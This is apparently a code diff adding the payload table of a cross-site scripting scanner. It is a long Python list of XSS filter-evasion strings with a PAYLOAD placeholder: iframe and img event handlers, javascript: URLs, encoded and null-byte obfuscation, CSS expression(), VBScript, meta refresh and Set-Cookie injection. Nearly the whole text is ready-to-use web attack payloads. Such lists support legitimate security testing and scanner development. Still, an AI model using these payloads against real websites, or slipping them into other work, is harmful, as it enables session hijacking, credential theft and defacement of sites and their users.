+        { 'payload':'''/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(PAYLOAD) /*iframe/src*/>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe src iframe src="javascript:javascript:alert(PAYLOAD)"></iframe src>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe src="javascript:alert(PAYLOAD); <''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe src=javascript:alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IFRAME SRC="javascript:alert(PAYLOAD);"></IFRAME>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IFRAME SRC="javascript:alert('PAYLOAD');"></IFRAME>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IFRAME SRC="javascript:javascript:alert(PAYLOAD);"></IFRAME>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;PAYLOAD&#x29; >''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe/src \/\/onload = prompt(PAYLOAD)''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iframe style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!--[if]><script>alert(PAYLOAD)</script -->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!--[if]><script>javascript:alert(PAYLOAD)</script -->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<image src=1 href=1 onerror="javascript:alert(PAYLOAD)"></image>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<image src="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img %00src=x onerror="alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img %00src=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img/&#09;&#10;&#11; src=`~` onerror=prompt(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img%10src=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img %11src=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img%11src=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img %12src=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img%13src=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img%32src=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img %34src=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img %39src=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img %47src=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img%47src=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img/anyjunk/onerror=alert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img dynsrc="javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG DYNSRC="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG DYNSRC="javascript:alert('PAYLOAD')">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG DYNSRC="javascript:javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG LOWSRC="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG LOWSRC="javascript:alert('PAYLOAD')">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG LOWSRC="javascript:javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"/><img/onerror=%09javascript:alert(PAYLOAD)%09src=xxx:x />''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"/><img/onerror=%0Ajavascript:alert(PAYLOAD)%0Asrc=xxx:x />''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"/><img/onerror=%0Bjavascript:alert(PAYLOAD)%0Bsrc=xxx:x />''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"/><img/onerror=%0Cjavascript:alert(PAYLOAD)%0Csrc=xxx:x />''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"/><img/onerror=%0Djavascript:alert(PAYLOAD)%0Dsrc=xxx:x />''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"/><img/onerror=%20javascript:alert(PAYLOAD)%20src=xxx:x />''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"/><img/onerror=%22javascript:alert(PAYLOAD)%22src=xxx:x />''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"/><img/onerror=%27javascript:alert(PAYLOAD)%27src=xxx:x />''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"/><img/onerror=%60javascript:alert(PAYLOAD)%60src=xxx:x />''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=a&#0108;ert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=a&#0108ert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=a&#108;ert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=a&#108ert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=`alert(PAYLOAD)`src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=”alert(PAYLOAD)”src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=alert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img/onerror=alert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img/onerror=alert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img/onerror=alert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''«img onerror=alert(PAYLOAD) src=a»''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<iMg onerror=alert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=a&#x0006c;ert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=a&#x006c;ert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=a&#x06c;ert(PAYLOAD) src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=MsgBox+PAYLOAD language=vbs src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG ONERROR=”VBS:EXECSCRIPT LCASE(‘ALERT(PAYLOAD)’)” SRC=A>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=”vbs:MsgBox PAYLOAD” src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG ONERROR=”VBS:MSGBOX PAYLOAD” SRC=A>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img onerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;PAYLOAD&#x29;&#x27;&#x29; src=a>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'/><img/onload=alert(PAYLOAD) src=""/>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG onmouseover="alert('PAYLOAD')">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG SRC=" &#14;  javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<IMG SRC=" &#14;  javascript:alert('PAYLOAD');">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''`"'><img src='#%27 onerror=javascript:alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src%32=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src%47=x onerror="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=a onerror=alert(PAYLOAD)''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=a onerror=alert(PAYLOAD) %0A>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=a onerror=alert(PAYLOAD)%0A>a''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!--<img src="--><img src=x onerror=alert(PAYLOAD)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=”<img src=x”/onerror=alert(PAYLOAD)//”> Jquery: <img/src/onerror=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!--<img src="--><img src=x onerror=javascript:alert(PAYLOAD)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<![><img src="]><img src=x onerror=javascript:alert(PAYLOAD)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src ?Y?\/onerror = alert(PAYLOAD)​​​''',
+          'browser':"""[Chrome]"""},
+        { 'payload':'''<img src="x:? title=" onerror=alert(PAYLOAD)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''><img src="x:x" onerror=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src='xx:x><img src=xx:x onerror=alert(PAYLOAD)>'>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src='xx:x onerror="alert(PAYLOAD)">'>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src='xx:x\ onerror="alert(PAYLOAD)">'>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=x:xx onerror="try {execScript('a=PAYLOAD','vbs');alert(PAYLOAD);}catch(e){alert(PAYLOAD);}">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=xx:xx alt=`/onerror=alert(PAYLOAD)//`>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''`"'><img src=xxx:x onerror=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!--<img src=xxx:x onerror=alert(PAYLOAD)> -->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!-- `<img/src=xx:xx onerror=alert(PAYLOAD)//--!>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=`xx:xx`onerror=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=xx:xx onerror=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=xx:xx onerror =alert(PAYLOAD);>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=xx:xx# /onerror=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''--><img src=xxx:x onerror=alert(PAYLOAD)> -->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''--><!-- ---> <img src=xxx:x onerror=javascript:alert(PAYLOAD)> -->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=xx:xx onerror=window[['alert']](PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=xx:xx onerror="&#X61;lert(PAYLOAD);alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img src=xx:xx onerror="x='\',alert(PAYLOAD)//'">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<img type=image src=Y.gif onreadystatechange=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input autofocus onfocus=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input id='1'><input id=1><script>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input id=PAYLOAD><input id=PAYLOAD><script>alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input onblur=alert(PAYLOAD) autofocus><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input onblur=javascript:alert(PAYLOAD) autofocus><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input onblur=write(PAYLOAD) autofocus><input autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input onfocus=javascript:alert(PAYLOAD) autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input onfocus=write(PAYLOAD) autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input/onmouseover="javaSCRIPT&colon;confirm&lpar;PAYLOAD&rpar;"''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input type="image" dynsrc="javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:alert('PAYLOAD');">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input type=image src=Y.gif onreadystatechange=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input type="text" AUTOFOCUS onfocus=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input type="text" value=``<div/onmouseover='alert(PAYLOAD)'>X</div>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input type="text" value=`` <div/onmouseover='alert(PAYLOAD)'>X</div>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<input value=<><iframe/src=javascript:confirm(PAYLOAD)''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<isindex action=javascript:alert(PAYLOAD) type=image>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<isindex type=image src=1 onerror=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<isindex type=image src=Y.gif onreadystatechange=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y%20-%22%3E%3Cscript%3Ealert(PAYLOAD)%3C%2Fscript%3E''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y%20%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"'`>Y<div style="font-family:'foo;x:expression(alert(PAYLOAD));/*';">Y''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"'`>Y<div style="font-family:'foo'x:expression(alert(PAYLOAD));/*';">Y''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="x:expression(alert(PAYLOAD))">Y''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''Y<div style="xexpression(alert(PAYLOAD))">Y''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<Y STYLE="Y:expression(alert(PAYLOAD))">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<keygen autofocus onfocus=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<keygen onfocus=javascript:alert(PAYLOAD) autofocus>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<LAYER SRC="javascript:alert(PAYLOAD);"></LAYER>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<LINK REL="stylesheet" HREF="javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<LINK REL="stylesheet" HREF="javascript:alert('PAYLOAD');">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<LINK REL="stylesheet" HREF="javascript:javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<li style=list-style:url() onerror=alert(PAYLOAD)></li>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<marquee onScroll marquee onScroll="javascript:javascript:alert(PAYLOAD)"></marquee onScroll>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<marquee onstart='javascript:alert&#x28;PAYLOAD&#x29;'>^__^''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<marquee onStart marquee onStart="javascript:javascript:alert(PAYLOAD)"></marquee onStart>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<meta charset="mac-farsi">¼script¾javascript:alert(PAYLOAD)¼/script¾''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(PAYLOAD)&&;&&<&&/script&&>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(PAYLOAD)&R&UA;&&<&A9&11/script&X&>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<meta content="&NewLine; PAYLOAD &NewLine;; JAVASCRIPT&colon; alert(PAYLOAD)" http-equiv="refresh"/>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="Link" Content="<javascript:alert(PAYLOAD)>; REL=stylesheet">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?;URL=javascript:alert(PAYLOAD)//">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<meta http-equiv="refresh" content="0;javascript&colon;alert(PAYLOAD)"/>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(PAYLOAD);">​''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('PAYLOAD');">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('PAYLOAD');">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<meta http-equiv="refresh" content="0;url=javascript:confirm(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(PAYLOAD)&lt;/SCRIPT&gt;">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(PAYLOAD)</SCRIPT>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('PAYLOAD')</SCRIPT>">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(PAYLOAD)"></OBJECT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(PAYLOAD)></OBJECT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(PAYLOAD)></OBJECT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<object classid="clsid:..." codebase="javascript:alert(PAYLOAD);">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(PAYLOAD)" style="behavior:url(#x);"><param name=postdomevents /></object>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(PAYLOAD)" style="behavior:url(#x);"><param name=postdomevents /></object>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<object onbeforeload object onbeforeload="javascript:javascript:alert(PAYLOAD)"></object onbeforeload>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<object onerror=alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<object onerror=javascript:javascript:alert(PAYLOAD)>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<object onError object onError="javascript:javascript:alert(PAYLOAD)"></object onError>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<object src=1 href=1 onerror="javascript:alert(PAYLOAD)"></object>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<object type=image src=Y.gif onreadystatechange=alert(PAYLOAD)></object>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''onerror=eval;throw'alert%28PAYLOAD%29';''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''onmouseover=alert(PAYLOAD);''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"onmouseover="alert(PAYLOAD)"a="''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"onmouseover=alert(PAYLOAD);a="''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''</plaintext\></|\><plaintext/onmouseover=prompt(1)''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<p/onmouseover=javascript:alert(PAYLOAD); >Y</p>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<p style="background:url('javascript:alert(PAYLOAD)')">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<P STYLE="behavior:url('#Zault#time2')" end="0" onEnd="javascript:alert(PAYLOAD)">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<p style="font-family:'\22\3bx:expression(alert(PAYLOAD))/*'">''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"'`><p><svg><script>a='Y%27;javascript:alert(PAYLOAD)//';</script></p>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"'`><p><svg><script>a='Y;alert(PAYLOAD)//';</script></p>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<p><svg><script>alert(PAYLOAD)</script></p>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27PAYLOAD%3F%29%29''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''s%22%20style=%22background:url(javascript:alert(’PAYLOAD’))''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''s%22%20style=x:expression(alert(PAYLOAD))''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<scr%00ipt%20&message=> alert(‘PAYLOAD’)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script /*%00*/>/*%00*/alert(PAYLOAD)/*%00*/</script /*%00*/''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>({0:#0=alert/#0#/#0#(PAYLOAD)})</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>({0:#0=eval/#0#/#0#(javascript:alert(PAYLOAD))})</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>/* *%00/javascript:alert(PAYLOAD)// */</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%00>javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%00javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%09>javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%09javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%09type="text/javascript">javascript:alert(PAYLOAD);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%0A>javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%0Ajavascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%0Atype="text/javascript">javascript:alert(PAYLOAD);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%0Bjavascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%0C>javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%0Cjavascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%0Ctype="text/javascript">javascript:alert(PAYLOAD);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%0D>javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%0Djavascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%0Dtype="text/javascript">javascript:alert(PAYLOAD);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>+-+-PAYLOAD-+-+alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''><script>PAYLOAD<\\/script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''\"><script>PAYLOAD<\\/script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''\\\'><script>PAYLOAD<\\/script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%20>javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%20javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%20language=vbscript>msgbox%20PAYLOAD</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%20type="text/javascript">javascript:alert(PAYLOAD);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%21javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>/* *%2A/javascript:alert(PAYLOAD)// */</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%2Bjavascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%2F>javascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':''''"`><script>/* *%2Fjavascript:alert(PAYLOAD)// */</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%2Ftype="text/javascript">javascript:alert(PAYLOAD);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%3Bjavascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script%3Etype="text/javascript">javascript:alert(PAYLOAD);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<ScRipT 5-0*3+9/3=>prompt(PAYLOAD)</ScRipT Y=?''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"`'><script>%7Ejavascript:alert(PAYLOAD)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>a%006cert(PAYLOAD);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT>a=/PAYLOAD/''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>a='Y\\';alert(PAYLOAD)//Y';</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''"'`><script>a=/Y;;i=0;alert(PAYLOAD);a/i;</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<SCRIPT>a=/Y/\nalert(PAYLOAD);</SCRIPT>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<<SCRIPT>alert(PAYLOAD);/''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(PAYLOAD,PAYLOAD</script//)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(PAYLOAD,PAYLOAD</script/)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>alert(PAYLOAD)/Y/'</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script>’alert(PAYLOAD)’.replace(/.+/,eval)</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<<script>alert(PAYLOAD);</script>''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<!-- -- --><script>alert(PAYLOAD);</script><!-- -- -->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<%25<!--'%25><script>alert(PAYLOAD);</script -->''',
+          'browser':"""[Not Info]"""},
+        { 'payload':'''<script<{alert(PAYLOAD)}/></script </>''',
+          'browser':"""[Not Info]"""},
